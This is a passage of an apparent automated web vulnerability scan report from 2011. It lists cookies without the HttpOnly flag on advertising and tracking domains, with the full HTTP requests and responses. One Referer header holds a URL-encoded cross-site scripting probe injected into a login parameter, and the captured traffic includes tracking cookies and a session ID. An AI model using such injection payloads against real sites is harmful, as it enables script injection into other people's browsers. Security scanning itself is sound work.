The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=3000001&c7=http%3A%2F%2Fwww.msn.com%2F&c9=&rn=1316281313735 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 17 Sep 2011 12:41:14 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 16-Sep-2013 12:41:14 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate


12.18. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3000001&d.c=gif&d.o=msnportallille&d.x=13228639&d.t=page&d.u=http%3A%2F%2Fglo.msn.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://glo.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 17 Sep 2011 12:46:45 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633]]>>; expires=Mon, 16-Sep-2013 12:46:45 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

12.19. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=I09839 HTTP/1.1
Host: js.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://answerology.delish.com/index.aspx?template=login.ascx&nextTemplate=home.ascxe81bd%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E384de482b57
Cookie: NETID01=f9891e48fd6ce58119cd075cc3adf5a4; NETSEGS_K05540=e98f30f2b8e2390e&K05540&0&4e91904a&0&&4e6c320d&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_H07707=e98f30f2b8e2390e&H07707&0&4e8312a8&4&10921,10926,11001,11087&4e5db56e&239be0b9fdae6d2fbd805afcd850cfc7; rtc_Xof4=MLvn8qEOYT5j57gfE729LhbkdUZ/Fm9flNSl1e+gREjG6tL0/JhXn3pmSJXYVrl2zwdgWhGtJY2neNa/R2Xpo2Y3tQekBoSF5xDCM3Gz70795K6387Dgzx2U95dVGRyFT8tm2wHiMJ5Prft6rSwyJZJjl0I/09K8ufd4T0h/DejwZOHQrQmhwNa+zQekuinO/ZJb9Aw5OQ0tc7jXxllKJ18MB/ZHhfS0hzulVGMBJKIxXSeCDq1j2/zUw5wPyFNIguAvR9FWCb47SkDZfFBkFkznDSs32PkmJxxcU4TOtHXnxu7xI3uvrs2rUkk+qACgmS5n/WfNAS0X+8eSnoWi88WnJ4Dh1BTB4sSY9w34PeQQhkL81JbB8Sa+DGs47hPM22en8a74hMxDMPmPdTB2pC0Ts5mOC0uy/k+p/bd9T9zkSZPdUOYKjamYfwIIIHUUUyHiKGuKEecW8zJaY1PKYZTvFbDEKHrY4sKDQgbVxMM2g475nlTlhcfTlx3Z4ooAWBWH0hKowDQIAxHzWPU9OKoh5xJWmNeASKT04ZxByhBzxoslzwdixDH30BHWr5mrUfhbl9t73IxBElBEJlxnWoZVcby8JXyT3aYnphENcngWTsxkRJsPM8Xlg5itywH5MM/h8yyjf91409rHDX8PG9+GWBRN6hiksjEixQsWP+LXrwDENckR1imnZscPBnRIztp2S/JaBsd5ZnHGQJ1l3nnlng==; NETSEGS_J08778=e98f30f2b8e2390e&J08778&0&4e8636da&0&&4e604379&239be0b9fdae6d2fbd805afcd850cfc7; rsiPus_OuYw="MLsXsFMNJi5npgBlK1GvRXjKr8jXeBM676apKCjon0PoR2BlWkU6QiFS5AQxH9ekd3klW0PdyoBMblNhpC4HewJ49MPhRAQohjYEW01hnZIb6S+yjQVwia85JT0yNFCyBFdLz0ckcEpNhJzznYiPSFjV+clP/7aazuVvHx2RNCMahPlFrED1gH2C9re7ZYtZR7nykpOULNFGTmyYqxsGpbrIGyaodlppi9p5WIXxhXZUfBewQ8CnzkeyQoSDbFBEnGn4dB9/XFWaaF2iHrfvP2/tH8CXhyRj1lqXftgCkSJ3dlyeEIm3kU5sqFnvR7B6yfhuBWt2d5OCmbmLBItrqNJepQnurWDx7pIZylfc28q/hQQ1Rfc0oFUHxInRKcNesjFxIfBUp7X2un5OKgADJyl4OOWxMEvDzaCm+Uw7wYWngwKRO2bJvWcqnx8yv/ZjAvIJqVt/8swTUhHrwyDhM9mLJcZj/MTOtKA43VI6V2uD3NbFqP5xGg/+Md0Alw+oZdFio0tSwRJQjR17yprxI3Bz8caVbzTcOTpTOU5I6rYCTwTCfCOGDiR5z7wFiM7j3b1wyLPDiw=="; rsiPus_xgUL="MLsX8FMNJi5nZmyuhwamDZURKQh4ku6Fu/MiXxBeciJerUI3RrBmeOzGfoxcAnkqaEp3frUhMhp9dPD8M7I2ZffF60tNbFoC9WY2UwnkxrTmnFx/wjJwCUKaah4t14tzWEpVvD7yvDHIo5bqXap3vaLaa0FXJ7S5o7+81ezBFBUB6mR32qFfh4Kn03gQgpI5dYhG8wqnnah2JqiwixCG+ECl8otv+mHdxP0VqPKP2E5dzqZRk9LHYSNMfHVjKJtDq+XLqKX5owgOpKK74PTM7YMs1d6MFHSBEFio8uvKpqDLHk9GwKjOVnFBm6pBwL2YK2CTzH55noSyhwv3aUjV2fjaBGRfQuSYzb+CLc9PQAQhyyyslXmstMZkZKvBrAb1Zux4Olytn++8msd62vZxI0N/bhuJuTAmoD1M8RgWpHqWN4ZC6jjokQ3rUTqQ2VNaWg5NUhzFDO5s8jHvKj3f5tHYiToPCOm/pjM7fGkk9CXfd13EkIOKk61gjI9PrnyZwh00InTKMBTOYtxZ1nyRZsqwgcu6dTALyzRxzrrTiCCg6DkuhyNvCrbxnfUN6PM+u80HZU0hvTQAPlglOMpEQvWcOjgMxnwcwDCUtKtDjmWHLel8yT7JCKtOYnfDHsFY3QEYyo83P1amaw=="; rsiPus_5Crz="MLsXsFEtpz5r5pD2EhhKJvMKybZ8kZyunI3prG0OG598rhBxqW69HWZVaXTzv43gws7/x8n+FW+nJHAAz82VDFHdLU9NbPYCJfWm+bWV2AxuD6aDB9WfijUxEv5cT2qX6MUIOT3FNG0ZiY7h5YLr+rm8a0FX2sSZk7+8VZL5EB4F7CQMA/EId/ol7kTgcoRvQfw9Ao1rQt4MtjXEClV/odpSsgAiv6p8t84i/yScJEpeQpeXZ6MsFfYXdfxi5WFI0lblSzN+sSiaY/Q5HGgrJoGWXKoInAhep0QTTL4Jdmsf+SCI+leqUIRwwn23wq5R8d7RRaBB0AwiKNHTpKKFSMySlQlyD68p6dKBr9yt6aywv4g7l1QOekvBMwFKcsyjNB1DxSSax4ywhNyhI8TitD6vfdCzbHmgrzDxBFXINAwjTJOf6b/GW/O5BPpQ8uNAMwhPRsD1dePx/kdEKHWVVR0I02wcYvX4oyM8IRWaPx/O2SI7LJ626i1Mfa1WLM2ppEULPsIa1kTWZ187yyJzeP2aV6R7+ehjUFay88PEDN1Tds0K6PvmIIantWzcXBwZ+h0h6jpVJfHdwAn0i//r6BpyCByF6pVKG08O3fLx9qMRT/nFD9crSir6H41JjBcAl4p4dkbnwg=="; rsi_us_1000000="pUMdIzlHMBYUlf2MMbu1n6bVETdvfD/OzxbY8rfFU1OQb8x+muMJYpggQiFqwXAMdIisASPJ065BmL0GMTmPtiecIFIw1bTh+dzYrQm2UlCjVRyFusJ6Vbix3tPJ5CN7uu0ApaNRpLHjW60Je3pwOF06SCh7nG3N18j8qAnTjxdVZdJpkTTk4stVSXHeztv8fsAJax5J5J1ljF3+dDYBUIz2N6aeVu2ruLL7Oj/c0YI7SFFQi2pkxHrE6wg0z8ZUaq2HBPx0kJ0PFmPh91LWNgMNuf6MVfEJY0f0RRRmCiR3jDMkAF70b1vkrELQNw/A6EF8Cyx3LFeO+IOFjW56zXx30kg8s9E8/gQ8p5JrkXm9UXHrKVsX+tMjfAbrhIgDbmSQgDUN5TOH+ACC2ccQWTzqNMwedw9/PcbCwA/wTz/+UZiZdeVGQPP6Zq/Hg4CAtuLpIZpw4ywDzvOMGxCtiRYNdZdDKuWe/sxK9PM1FpYpbb6UYcrg1i/D2j2x+g3d3OKKsIJYcb4E4xvV0CQXv397niegVSWlT0bEsw1widtA9YaDQ2I3hcVd3UaC7DyRnLJp1UBTYri3BwvJQu6NQ+OQuZxDRZR9KTx+QX8asZmLqfMmOj+6LpnU4KXpM6WtMSLIZ6FolYNRFmfi7bCq5Ll1zm1AePVDPg+uSB6eoCCGz5Luk/mnK1ckmU59A68Mywz5bXnOmP6HDeQ7vg3t7L7w72DqjASp/PTy+Bw3Dbz+WhlSOLUeyRhVlJMfsudUEQByDtAXRp4nGKaSuF5fMdDvTQy8cD+mhB1ZFTubPiBVckcvzFBbCrCMpS2cA8Qwf4mh1pVm+aOTa+QYe1+MBnz9G8QKi1Fqp9RldsGXJo4fvH1kSzQWu+YbMKtu6NuGD7xOoCgoRKefHpdHAbnhsLtWs6XgYtvQj1zR9NBE8uwtOZvxILslEpGrauOuCvT7lHcZuEGu8xbtiZ+hzC3QdL+SVjtk+GjRIWM/W4Ef3XVwB8DYA3nLqXoWTnQV0fMjG1I1IGoM61khs5XO9dx4Q0vuMgRlhNtIttHevtKE645cfqrKwmlqCEA2Mo+UcJsL/wlU1BgX9FF54F5hEaao/otyURWjfxM/MRds9E1Q5NeMBiLKazNyP68Ls2ZiClKwYA5WJs3ekRmSXqWKAY6d9erjzQQK94B8xga6thffohr3hTJtXcxbUyyXBSBZoW/WvCq6IeGS6qscibwSVe4ZE1DkpR3khAnT8JqLXnfh0pq5wWBSvMTulLYXWA=="; udm_0=MLv3NCMJaSprXRdgl7/Be8T0ZEDoyHXLvN5yYaeHcjC63fx5ewQAynTQIhPVoVfL+IOpjNyfpGlQgsAgEW7MkKtyKcifzKcx0C10lRJo46VrRHjqe3Roc0Iue5IFRip/ChyXWl6tFID+rcWexo1djbF+Tz0z03rIInEjzVO4OEpi9Jy35mo9UaujVNA4ZKjdj7egNAqOp2cBRZAJGS82dX/HtjrgrGD0nIIBkC1K1KyLRz1SlRSYlj36LRqbrQvOHrDogSObi6IZNexL47jEuthiyzXkgeCA9hQhYQmqVmYKaaHkiU8sIi05sWvEHAP6M+ibJbaawm/3636+seoSxLqfE0mpg04ffG6CWEu9u2DvKMhzQMykcAo1W4CxuYJJCrpQQc53MnKtOTl/eHFv6YamCvKuBubUJ3PDrjDrQi4Vh2bX/MWrFNvCI4+gr46b0pyrvgxDFyxgwGpl8f679h3QqKu1UeOLRuIZAio6Tn7D4irQDqerMSyVg7iNfr3Yk5ORGOFordHGYpvy42v3RbERIAfg2GQk/xrWkv2IXLOUZqHibR9VAUL9JgLx5CqUrgOybkiiTHLYw/yMi5uxDy8jNbcXMbAiJyi9uEBl8W8JLGeViImuvsFEYWVmpl4KUpqO7bE6yOkKnfMhi9OF7zlnExCKDpzE3jMixoqbKQeuKt2gbXNOI+DiCAapOF8KNSoUb6TITY5/JrTLYTWHI8AvKjbxV8WRMZiYtArpQirJaZmRt3xjs/JvU2cZ0xgDuPGNJ7eHUk67GV29K7CJPCo4oZOaeCcvNj1rHD3RFezCWV6YhQW2jo0b4l888RQtu9loKYzZF7cF1qEZVY9JHjV9hvto7H8H1vSjg2m/pP3Ozk2UuEGNVDBdYg8IdFOeIC+aWOhQYDRLeDKak0vZI7+emQLFTXqGsQGA6+k41NuoJ0TK6wwoACfUsA2LRxM3S1X99Dk9OieYTLewtbXSPpqOnjLxbBsRiR05Yx/Q7qx46sa3lx1FCMmRl33U+EH8xZ1cRP/2oU8r6G5tC5o/KbRQfA92GUbqfelZXcbaKeNN/P3RS+l5ZlAs+enEoZQl/Xg/JHQplxoc64xuyXntuyuEsJm/ki4P0eJgB0jWNpZksmWyJOKaXUTq1izdVWKJBwxZWEHCoHY3vtbzZHz3rMbyQshbYVVPAOVof+p1XTX5pUg/yjlF3DIqDZ6rrNgXzcaRiqum/8lrPbaGm1oSl3lEXuaMbxsyEFL97iGS6CZTwDL54qk9IT6VMN9L9f7eRQ0Du0IXyYUEZT2/IUevvx6GH8LHtkBfVGWOLymKGJRnSihWHUjw2MSbeA6dph8nL0XwpgivZhZ0UHJFQVeieblFgTnOYBV/I7J/CsL4kGZZRcIqx4lTyDlbffzm57gh226vozQBLTReYNZWbM5n0RpDjBOdFxhHwuM=; rsi_segs_1000000="pUPFJkOBb3IQV+Ubea77UACbRNo8W3wOBKzagTEaRHs7MiO0U2rjoS2ouxUK6pw26DoqmdXj5mzAQCOhsLMwAg/BVuSssX26D3w7r78D/X/ICzbfWcmIZjZhBhW2mMDSMdqLrr9WaE4U+6eBzBxd8hyY5bU6bhonR9FDEEm9T4mghGtoluIoeJq7wO35gaQSc59PlYqC3peL0GG4KGbawFu2B2g4H/USp1IbXBCBcUtcKXfGFTwzQenAmzZqCmvHNlfLM5lz3aFm5ghLVhCKQW9WwQkMVPdhh71fAOhkc7x5ThtXF6i0C79bRBYoFMSgaMO8wfCfZWo88cnXcI8="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvvNC8JZjpr3hepv03QX8AE8YwJLkXmxG8JxJY6miRpTrlTOjX/Y2OCll+Bt80SmpSIWwjkTOZB0ulTpYYkYY26o+h7F8Jn+/1xn/3os6XlVNAH0LB5h6HhI08Ru+nNOBYvAbuNEpzbP4z8z9iOftvgjA+5ynT3pEaEidNrgBZSDqg9FxZzzHmLn0I++FMl3tsUB+e634Isc+tzVMhYfmnjxFc3BxwPqL3JaQ1IcSQHmX3as5QBp93JnApei6qANd+EJYB/CX3uSuKoyk88JfsW9TZMFMth5xS+ZHKJGPxwlVn0aexP/Wj/qvUK/BH6Q2pFjRosm5S9Wicy+hQovnvsriqDLlYC8MIgQQTlCUq8xmEazEgUFeGkCoVmFrgZBQ/sqBVZMCEQiZsodOMd/bXGKFC0oQV3lhY05i1btsJslkz76KmvPwxOME1mPe0r3Z6AYuShxorNR+8lcu81BhNH8gia0BXp0uLnZH+0dSd9cGvFPGm3l/g0kwwti6CugcvMnLftRWDWyM1hssb1jAFxlfI6L8+B3ISFem3YhabkJGfwebiYmOIp1QBcLX0ONsitDKM/yVEmKjbBlJyXD9l/OufYxOD6+EQfBj1ldG7XFWcVqKmWjt1AUOWYprwBC6AcstatfzBjZI8lQ4+DO7Vs49tiEbMZkC217MtL/K47Uu21+MjGJ4VDMoQOE8gHvUNGQ/qMi3/jKaOzRBnX3XiHHtEbQeVz2tgdNQYJB7oB+/5vybLrJsSud3cT1ujQ1NQsj53Ds7by+dUvCfVzA1zb19DezkCHVanpYMLL3wWlL7GAwJe1GKmSQ3zKvrgPWaPulxDezK0Jto76/2ZRa1e6bgmq/r6LuqvLbRmI5mt76/X1ySWSlkOYKf2X91bY+iII9ei194od+UnAl7AqCkxOzF1nLfuEog45rTaxNANYdTKAvlq07YSWpF5stKaNbFWv+epYzv77zKEzS4iI7eta7FyZiuZrQFPE/o2ig7NhjwC2Vp6I+Y/fnpAKXPsbYl33n5x8rJcMrtUNxU7makpiEdWof5mRmA4cy9TWo4o8yiTQhrmCSSqgb9OfxoKxZv451KZX0Eeci9zT0sjxMqT3kL4caL/3jTB7jEYUMVrE4wVQOcdYjY0Lrs/+nYjr+B19YfAWivqpd2xcYkJ0WHm9UO5jk+vwj21S7KjQ8K/sdzwBLRtUhLUWRjlRELsThpw/txYBiK8/WcdKWrHKpLF9SXGOdKcJa+WY5u41fFG7xSc5so+Li6BTS1fcgj5aPQdFstBMFjv3vh/jWWk+MS8vfD7O24d3jyyfXvwr6DmnhIcvxV1IW7JnAxl5xuZfjlxR4DZorEIhGb1sO0SrQN0WXNjEdETiHBKL8bylu7wrUDS97GtUVlFuRdNebzOkQySc0/x7CWlBUFt7bB7prNM1NTFmlYF2DazWHoB4e45/sV5yNHJNxFBBRDUCljxoIgZdu6iOKA63a2HfZT1jpQY=; Domain=.revsci.net; Expires=Sun, 16-Sep-2012 14:35:47 GMT; Path=/
Last-Modified: Sat, 17 Sep 2011 14:35:47 GMT
Cache-Control: max-age=3600, private
Expires: Sat, 17 Sep 2011 15:35:47 GMT
X-Proc-ms: 10
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 14:35:47 GMT
Content-Length: 4598

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'I09839';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...

12.20. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4e37104432fe1148 HTTP/1.1
Host: pixel.33across.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh53.html
Cookie: 33x_ps=u%3D8746800456%3As1%3D1312556891392%3Ats%3D1315247534049%3As2.33%3D%2C6940%2C

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 14:44:01 GMT
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=u%3D8746800456%3As1%3D1312556891392%3Ats%3D1316270110800%3As2.33%3D%2C6940%2C100043%2C100072%2C; Domain=.33across.com; Expires=Sun, 16-Sep-2012 14:44:01 GMT; Path=/
Location: http://ib.adnxs.com/mapuid?t=2&member=1001&user=8746800456&seg_code=33x,6940,100043,100072&random=397105
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


12.21. http://s.dlqm.net/asdet/read_dlqm_v2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.dlqm.net
Path:   /asdet/read_dlqm_v2.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /asdet/read_dlqm_v2.php?site=10&from_aicode=922738&survey_num=913131 HTTP/1.1
Host: s.dlqm.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 14:33:51 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Location: http://survey.questionmarket.com/surv/913131/ai_final.php?member_id=326080797&site=10&from_aicode=922738&survey_num=913131
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_iuuq-t.emrn.ofu=445836713660;Version=1;Max-Age=1200;path=/


12.22. http://segment-pixel.invitemedia.com/set_partner_uid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=169&partnerUID=4e37104432fe1148&sscs_active=1 HTTP/1.1
Host: segment-pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh53.html
Cookie: uid=32c961cd-226e-4e58-a3bf-a49df64f43b3; segments_p1="eJzjYuFY1sjMxcIx9w8zFzPH+jwgc+EdRiC5/zWI3A0mj31nAkquBUl2doBU7wAL991n5uLkeBAucGfO4c8sQIHe40xA8sx7kOSt7SCRSUCSmeN5LpC5CaiHk2N6gMCvu21fQHIb14PI02DVt8Gq94GN/fIBRO78CCInAsU5Oe5HCzz/8eYzyKh/HEDRoxBXvWYEACqCOLA="; exchange_uid=eyIyIjogWyIyMjMwNjE2MjU1NTY5NzE1ODc3IiwgNzM0Mzg3XSwgIjQiOiBbIkNBRVNFRGxwczBXRFF6TF9zR0NPQ2RlekdZTSIsIDczNDM4NV19; uid=776b70d9-5df4-4d1b-98af-982dd1709cac; subID="{}"; impressions="{\"726143\": [1312827315+ \"01026648-7049-425e-a7ce-9a7cb258a341\"+ 70243+ 29835+ 1365]+ \"778530\": [1312501863+ \"7260679259817030178\"+ 162013+ 105345+ 12332]}"; camp_freq_p1="eJzjkuH4dZZZgFFi8/mGTywKjBrvQbQBowWYzyXCca2PHSj7/MGbjywKDBoMBgwWDAD8gxIK"; io_freq_p1="eJzjEuZY5SzAKLH5fMMnFgNGCzDNJczRmgEUfP7gzUcWBQYNBgMGCwYAJnoNKA=="; dp_rec="{\"2\": 1312827317+ \"4\": 1312827314}"; partnerUID="eyIxMTUiOiBbIjRlMzcxMDQ0MzJmZTExNDgiLCB0cnVlXSwgIjE5OSI6IFsiQkI0MEFFQTI5RUFFQjNGMDBCOTI1ODkzOUZDMEQ3RjMiLCB0cnVlXSwgIjE2OSI6IFsiNGUzNzEwNDQzMmZlMTE0OCIsIHRydWVdLCAiODQiOiBbIkVhemJWWUdKOTk5cjZZa20iLCB0cnVlXX0="; conversions="{\"70914\": 1315307386+ \"61326\": 1315307639}"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 14:44:03 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 17-Sep-2011 14:43:43 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyIxMTUiOiBbIjRlMzcxMDQ0MzJmZTExNDgiLCB0cnVlXSwgIjE5OSI6IFsiQkI0MEFFQTI5RUFFQjNGMDBCOTI1ODkzOUZDMEQ3RjMiLCB0cnVlXSwgIjE2OSI6IFsiNGUzNzEwNDQzMmZlMTE0OCIsIHRydWVdLCAiODQiOiBbIkVhemJWWUdKOTk5cjZZa20iLCB0cnVlXX0="; Domain=invitemedia.com; expires=Sun, 16-Sep-2012 14:44:03 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

12.23. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segs.btrll.com
Path:   /v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221 HTTP/1.1
Host: segs.btrll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://answerology.delish.com/index.aspx
Cookie: BR_MBBV=Ak5Bsatsr1Z1AeV1e6w; DRN1=AGPX0VIEGKsAY9g6Ttf0Bw

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 14:31:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak5Bsatsr1Z1AeV1e6w; expires=Sat, 15-Sep-2012 14:31:31 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: DRN1=AGPX0VIEGKsAY9g6TutWQw; expires=Mon, 16-Sep-2013 14:31:31 GMT; path=/; domain=.btrll.com
Location: http://cache.btrll.com/default/Pix-1x1.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


12.24. http://survey.questionmarket.com/images/survey/progress2/progress_100percent.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /images/survey/progress2/progress_100percent.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/survey/progress2/progress_100percent.gif HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; PHPSESSID=959bcd26e14b9626e1332081ccc6c315; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:34:37 GMT
Server: Apache
Last-Modified: Wed, 01 Aug 2007 20:58:12 GMT
ETag: "d756db4b-a2-436a99582e880"
Accept-Ranges: bytes
Content-Length: 162
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
Content-Type: image/gif
